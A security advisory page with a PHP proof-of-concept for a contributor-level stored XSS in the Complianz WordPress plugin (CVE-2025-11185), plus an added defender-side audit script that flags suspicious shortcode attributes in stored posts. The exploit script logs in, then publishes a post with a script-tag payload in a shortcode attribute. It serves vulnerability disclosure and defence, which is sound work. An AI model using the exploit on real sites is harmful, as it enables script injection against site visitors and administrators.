Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-11185 - Complianz | GDPR/CCPA Cookie Consent <= 7.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

<?php
/**
 * Proof of Concept for CVE-2025-11185
 * Requires: Contributor-level WordPress credentials
 * Target: WordPress sites with Complianz plugin <= 7.4.3
 */

// Configuration
$target_url = 'https://target-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload - XSS via cmplz-accept-link shortcode attribute
$payload = '[cmplz-accept-link attribute="<script>alert(document.domain)</script>"]';

// Initialize cURL session
$ch = curl_init();

// Step 1: Authenticate and get WordPress nonce
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Step 2: Create a new post with malicious shortcode
$create_post_url = $target_url . '/wp-admin/post-new.php';

// First, get the nonce for creating posts
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from the page (simplified - in real scenario use proper parsing)
// Note: Actual implementation would need to parse the HTML for _wpnonce

$post_data = array(
    'post_title' => 'Test Post with XSS',
    'content' => $payload,
    'post_status' => 'publish',
    '_wpnonce' => 'NONCE_PLACEHOLDER', // Replace with actual nonce
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'post_type' => 'post',
    'submit' => 'Publish'
);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));

$response = curl_exec($ch);

// Check if post was created successfully
if (strpos($response, 'Post published') !== false || strpos($response, 'Post updated') !== false) {
    echo "[+] Exploit successful! Post created with XSS payload.\n";
    echo "[+] Visit the post to trigger the XSS.\n";
} else {
    echo "[-] Exploit failed. Check credentials and permissions.\n";
}

curl_close($ch);
?>
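Added example (not Atomic Edge's or Complianz's code): a defender-side audit that scans stored post content for cmplz-accept-link shortcodes and reports every attribute value that is not plain text. The function name, the allow-list and the sample posts are assumptions constructed for illustration; the allow-list is deliberately strict, so expect false positives that need a human look.

```php
<?php
// Added example, not plugin code. Post IDs and content below are constructed.

/**
 * List cmplz-accept-link attributes whose value is not plain text.
 *
 * @return array<int, array{attr: string, value: string}>
 */
function audit_accept_link_shortcodes(string $content): array
{
    // Whole tag; quoted values are consumed as units so a ']' inside quotes
    // does not end the match early.
    $tag_re = '/\[cmplz-accept-link(?![\w-])((?:"[^"]*"|\'[^\']*\'|[^\]"\'])*)\]/i';
    // name="value", name='value' or name=value
    $attr_re = '/([\w-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s\]"\']+))/';
    // Allow-list: letters, digits, spaces and light punctuation only.
    $plain_re = '/^[\p{L}\p{N} _.,!?-]*$/u';

    $findings = [];
    preg_match_all($tag_re, $content, $tags, PREG_SET_ORDER);
    foreach ($tags as $tag) {
        preg_match_all($attr_re, $tag[1], $attrs, PREG_SET_ORDER);
        foreach ($attrs as $a) {
            // Exactly one of the three value groups is non-empty.
            $value = ($a[2] ?? '') . ($a[3] ?? '') . ($a[4] ?? '');
            // preg_match returns false on invalid UTF-8; treat that as a finding too.
            if (preg_match($plain_re, $value) !== 1) {
                $findings[] = ['attr' => $a[1], 'value' => $value];
            }
        }
    }
    return $findings;
}

// Constructed sample rows: post ID => post_content.
$posts = [
    101 => 'Intro text [cmplz-accept-link attribute="Accept cookies"] more text.',
    102 => '[cmplz-accept-link attribute="<script>alert(document.domain)</script>"]',
];

foreach ($posts as $id => $content) {
    foreach (audit_accept_link_shortcodes($content) as $f) {
        // json_encode keeps the value on one line and makes control characters visible.
        printf("post %d: %s = %s\n", $id, $f['attr'], json_encode($f['value']));
    }
}
```

On a live site, feed it the post_content of every row in the posts table, drafts, pending posts and revisions included, since contributor submissions sit there before an editor previews them.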
